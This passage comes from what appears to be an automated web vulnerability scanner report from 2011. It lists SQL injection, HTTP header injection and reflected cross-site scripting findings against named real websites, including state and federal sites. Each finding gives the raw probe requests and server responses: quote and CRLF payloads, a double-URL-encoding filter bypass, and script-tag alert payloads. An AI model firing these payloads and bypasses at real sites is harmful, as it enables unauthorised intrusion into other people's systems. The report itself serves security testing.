Set-Cookie: plloginoccured=false; path=/
Set-Cookie: REQUESTURLBEFORESSO=http://www.budget.state.pa.us:80/portal/server.pt/gateway''/PTARGS_0_2_38668_4566_458236_43/http; path=/
Set-Cookie: ASP.NET_SessionId=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 357

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/portal/SSORedirect.aspx?">here</a>.</h2>
</body></html>
<!--Hostname: ENCTCISP270--><!--Total Request Time: -1
Con
...[SNIP]...

1.7. http://www.budget.state.pa.us/portal/server.pt/gateway/PTARGS_0_2_39070_4566_458236_43/http [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.budget.state.pa.us
Path:   /portal/server.pt/gateway/PTARGS_0_2_39070_4566_458236_43/http

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /portal/server.pt/gateway%2527/PTARGS_0_2_39070_4566_458236_43/http HTTP/1.1
Host: www.budget.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=uik0x145tlcpdsedjzdxtmqz;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:29:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
PT-HTTPResponse-Type: SESSION_TIMEOUT
PT-Login-URL: http://www.budget.state.pa.us/portal/server.pt?space=Login&cached=false
Pragma: no-cache
Content-Language: en
Set-Cookie: plloginoccured=false; path=/
Set-Cookie: REQUESTURLBEFORESSO=; path=/
Expires: 1304080195683
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Last-Modified: 1304166595683
Content-Type: text/html; charset=utf-8
Content-Length: 26799

<html>

<head><link type="text/css" href="http://www.portal.state.pa.us/imageserver/plumtree/common/public/css/mainstyle19-en.css" rel="StyleSheet" lang="en"></link><title>Log In</title><script type="
...[SNIP]...
ject, like a hashtable. **/
var gSafeJSVarContainer = new Object();
/** Define a new safe variable, pass the in the name and the value.Returns true if successful, method call will fail if the value is invalid. **/
function addSafeVar(strName, oValue) {
   gSafeJSVarContainer[strName] = oValue;
   return true;
}
/** Retrieve a safe var. Returns false if the variable is undefined or if the value is actually fal
...[SNIP]...

Request 2

GET /portal/server.pt/gateway%2527%2527/PTARGS_0_2_39070_4566_458236_43/http HTTP/1.1
Host: www.budget.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=uik0x145tlcpdsedjzdxtmqz;

Response 2

HTTP/1.1 302 Found
Connection: close
Date: Sat, 30 Apr 2011 12:29:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /portal/SSORedirect.aspx?
Set-Cookie: plloginoccured=false; path=/
Set-Cookie: REQUESTURLBEFORESSO=http://www.budget.state.pa.us:80/portal/server.pt/gateway%27%27/PTARGS_0_2_39070_4566_458236_43/http; path=/
Set-Cookie: ASP.NET_SessionId=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 357

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/portal/SSORedirect.aspx?">here</a>.</h2>
</body></html>
<!--Hostname: ENCTCISP270--><!--Total Request Time: -1
Con
...[SNIP]...

1.8. http://www.vsea.org/join-your-union [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.vsea.org
Path:   /join-your-union

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /join-your-union?1'=1 HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
Referer: http://www.vsea.org/join-vsea
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e

Response 1

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:17:12 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 30 Apr 2011 01:17:12 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 39898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Joi
...[SNIP]...
<script type="text/javascript">$(window).load(function(){$('.status').Pulsate(200, 6);$('.error').Pulsate(200, 6);});</script>
...[SNIP]...

Request 2

GET /join-your-union?1''=1 HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
Referer: http://www.vsea.org/join-vsea
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e

Response 2

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:17:14 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 30 Apr 2011 01:17:14 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 39526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Joi
...[SNIP]...

1.9. http://www.vsea.org/sites/vsea.org/themes/unionproud2/favicon.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.vsea.org
Path:   /sites/vsea.org/themes/unionproud2/favicon.ico

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /sites/vsea.org/themes%2527/unionproud2/favicon.ico HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 29 Apr 2011 22:20:01 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 29 Apr 2011 22:20:03 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 32193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Pag
...[SNIP]...
<script type="text/javascript">$(window).load(function(){$('.status').Pulsate(200, 6);$('.error').Pulsate(200, 6);});</script>
...[SNIP]...

Request 2

GET /sites/vsea.org/themes%2527%2527/unionproud2/favicon.ico HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 29 Apr 2011 22:20:05 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 29 Apr 2011 22:20:05 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 31877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Pag
...[SNIP]...

1.10. http://www.vsea.org/sites/vsea.org/themes/unionproud2/splash_flash/slideShow.swf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.vsea.org
Path:   /sites/vsea.org/themes/unionproud2/splash_flash/slideShow.swf

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /sites/vsea.org/themes%2527/unionproud2/splash_flash/slideShow.swf HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
Referer: http://www.vsea.org/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 01:19:01 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 30 Apr 2011 01:19:01 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 32289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Pag
...[SNIP]...
<script type="text/javascript">$(window).load(function(){$('.status').Pulsate(200, 6);$('.error').Pulsate(200, 6);});</script>
...[SNIP]...

Request 2

GET /sites/vsea.org/themes%2527%2527/unionproud2/splash_flash/slideShow.swf HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
Referer: http://www.vsea.org/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 01:19:03 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 30 Apr 2011 01:19:03 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 31909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Pag
...[SNIP]...

2. HTTP header injection

There are 5 instances of this issue:

2.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [bwVal parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the bwVal request parameter is copied into the Set-Cookie response header. The payload e49bd%0d%0a59c112e0288 was submitted in the bwVal parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5153469~~0~~~^eb75Per_Played~0~14453476~01010^ebVideoFullPlay~0~14453476~01010^ebAdDuration~189~0~01020^ebAboveTheFoldDuration~189~0~01020^ebVideoPlayDuration~41~0~01010^ebVideoAssetDuration~41~14453476~01010&OptOut=0&ebRandom=0.9262445359490812&flv=10.2154&wmpv=0&res=128&bwVal=e49bd%0d%0a59c112e0288&bwTime=1304165755979 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://io9.com/static/ad_iframe.php?script_url=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fgm.io9%2Ffront%3Bptile%3D3%3Bsz%3D300x250%3Bord%3D96869397%3BmtfIFPath%3D%2Fassets%2Fvendor%2Fdoubleclick%2F%3Borigin%3Dgawker%3Bvisited%3Dio9front%3Bvisited%3Dgawkerfront%3F&rand=96869393&nocache=true
Origin: http://io9.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=a3ac447e-4ff7-4236-8fa8-7b9e749842b33HS080; expires=Fri, 29-Jul-2011 08:18:46 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=e49bd
59c112e0288
&BWDate=40663.346366&debuglevel=&FLV=10.2154&RES=128&WMPV=0; expires=Fri, 29-Jul-2011 08: 18:46 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 30 Apr 2011 12:18:45 GMT
Connection: close
Content-Length: 0


2.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload d372e%0d%0acccbab88b97 was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5153469~~0~~~^eb75Per_Played~0~14453476~01010^ebVideoFullPlay~0~14453476~01010^ebAdDuration~189~0~01020^ebAboveTheFoldDuration~189~0~01020^ebVideoPlayDuration~41~0~01010^ebVideoAssetDuration~41~14453476~01010&OptOut=0&ebRandom=0.9262445359490812&flv=d372e%0d%0acccbab88b97&wmpv=0&res=128&bwVal=737&bwTime=1304165755979 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://io9.com/static/ad_iframe.php?script_url=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fgm.io9%2Ffront%3Bptile%3D3%3Bsz%3D300x250%3Bord%3D96869397%3BmtfIFPath%3D%2Fassets%2Fvendor%2Fdoubleclick%2F%3Borigin%3Dgawker%3Bvisited%3Dio9front%3Bvisited%3Dgawkerfront%3F&rand=96869393&nocache=true
Origin: http://io9.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=870212d3-2f21-4fa2-8e03-d2dfc0432b973HS020; expires=Fri, 29-Jul-2011 08:18:45 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=737&BWDate=40663.346354&debuglevel=&FLV=d372e
cccbab88b97
&RES=128&WMPV=0; expires=Fri, 29-Jul-2011 08: 18:45 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 30 Apr 2011 12:18:45 GMT
Connection: close
Content-Length: 0


2.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload dc1e1%0d%0a2a2f0567f4f was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5153469~~0~~~^eb75Per_Played~0~14453476~01010^ebVideoFullPlay~0~14453476~01010^ebAdDuration~189~0~01020^ebAboveTheFoldDuration~189~0~01020^ebVideoPlayDuration~41~0~01010^ebVideoAssetDuration~41~14453476~01010&OptOut=0&ebRandom=0.9262445359490812&flv=10.2154&wmpv=0&res=dc1e1%0d%0a2a2f0567f4f&bwVal=737&bwTime=1304165755979 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://io9.com/static/ad_iframe.php?script_url=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fgm.io9%2Ffront%3Bptile%3D3%3Bsz%3D300x250%3Bord%3D96869397%3BmtfIFPath%3D%2Fassets%2Fvendor%2Fdoubleclick%2F%3Borigin%3Dgawker%3Bvisited%3Dio9front%3Bvisited%3Dgawkerfront%3F&rand=96869393&nocache=true
Origin: http://io9.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=84d88477-c309-4ed1-b009-c75e2ccf2de23HS060; expires=Fri, 29-Jul-2011 08:18:45 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=737&BWDate=40663.346354&debuglevel=&FLV=10.2154&RES=dc1e1
2a2f0567f4f
&WMPV=0; expires=Fri, 29-Jul-2011 08: 18:45 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 30 Apr 2011 12:18:44 GMT
Connection: close
Content-Length: 0


2.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 31719%0d%0ace2df32a2d8 was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5153469~~0~~~^eb75Per_Played~0~14453476~01010^ebVideoFullPlay~0~14453476~01010^ebAdDuration~189~0~01020^ebAboveTheFoldDuration~189~0~01020^ebVideoPlayDuration~41~0~01010^ebVideoAssetDuration~41~14453476~01010&OptOut=0&ebRandom=0.9262445359490812&flv=10.2154&wmpv=31719%0d%0ace2df32a2d8&res=128&bwVal=737&bwTime=1304165755979 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://io9.com/static/ad_iframe.php?script_url=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fgm.io9%2Ffront%3Bptile%3D3%3Bsz%3D300x250%3Bord%3D96869397%3BmtfIFPath%3D%2Fassets%2Fvendor%2Fdoubleclick%2F%3Borigin%3Dgawker%3Bvisited%3Dio9front%3Bvisited%3Dgawkerfront%3F&rand=96869393&nocache=true
Origin: http://io9.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=aef03abd-dd91-446d-b768-963740a2915b3HS020; expires=Fri, 29-Jul-2011 08:18:45 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=737&BWDate=40663.346354&debuglevel=&FLV=10.2154&RES=128&WMPV=31719
ce2df32a2d8
; expires=Fri, 29-Jul-2011 08: 18:45 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 30 Apr 2011 12:18:45 GMT
Connection: close
Content-Length: 0


2.5. http://wbtdcs.nara.gov/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wbtdcs.nara.gov
Path:   /dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload e8809%0d%0a3db0a68c794 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /e8809%0d%0a3db0a68c794/dcs.gif?&dcsdat=1304124544659&dcssip=www.archives.gov&dcsuri=/veterans/evetrecs/index.html&WT.tz=-5&WT.bh=19&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=File%20Moved%20During%20the%20Redesign&WT.js=Yes&WT.jv=1.5&WT.bs=998x892&WT.fi=Yes&WT.fv=10.2 HTTP/1.1
Host: wbtdcs.nara.gov
Proxy-Connection: keep-alive
Referer: http://www.archives.gov/veterans/evetrecs/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 00:49:38 GMT
Server: Apache
Location: /e8809
3db0a68c794
/dcs.gif?dcsredirect=1&dcsdat=1304124544659&dcssip=www.archives.gov&dcsuri=/veterans/evetrecs/index.html&WT.tz=-5&WT.bh=19&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=File%20Moved%20During%20the%20Redesign&WT.js=Yes&WT.jv=1.5&WT.bs=998x892&WT.fi=Yes&WT.fv=10.2
Set-Cookie: WEBTRENDS_ID=173.193.214.243-2072764016.30148304; path=/
Last-Modified: Fri, 10 Mar 2006 19:37:06 GMT
ETag: "3d-2b-1e369c80"
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

3. Cross-site scripting (reflected)
There are 250 instances of this issue:


3.1. http://ads.adbrite.com/adserver/vdi/711384 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/711384

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload eb4e8<script>alert(1)</script>fe50c6cc575 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/711384eb4e8<script>alert(1)</script>fe50c6cc575?d=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=0.2983929158654064 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; ut="1%3AHYxBDoMgEAD%2FsmcOLiht%2FI0oRtPNWsCWoOvfJV5nJnPCX0N%2FwseXvMUpQQ8hmCMLhreJJFqwU0mniILfMjPLIIj7oRJ5olq5PW%2FyEuuMGheya7EtVzw1v2qlAQVuYPZxfd5wXTc%3D"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Sat, 30 Apr 2011 15:09:00 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/711384eb4e8<script>alert(1)</script>fe50c6cc575

3.2. http://agency.governmentjobs.com/tennessee/default.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://agency.governmentjobs.com
Path:   /tennessee/default.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3bda"><script>alert(1)</script>1d3b780a45a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

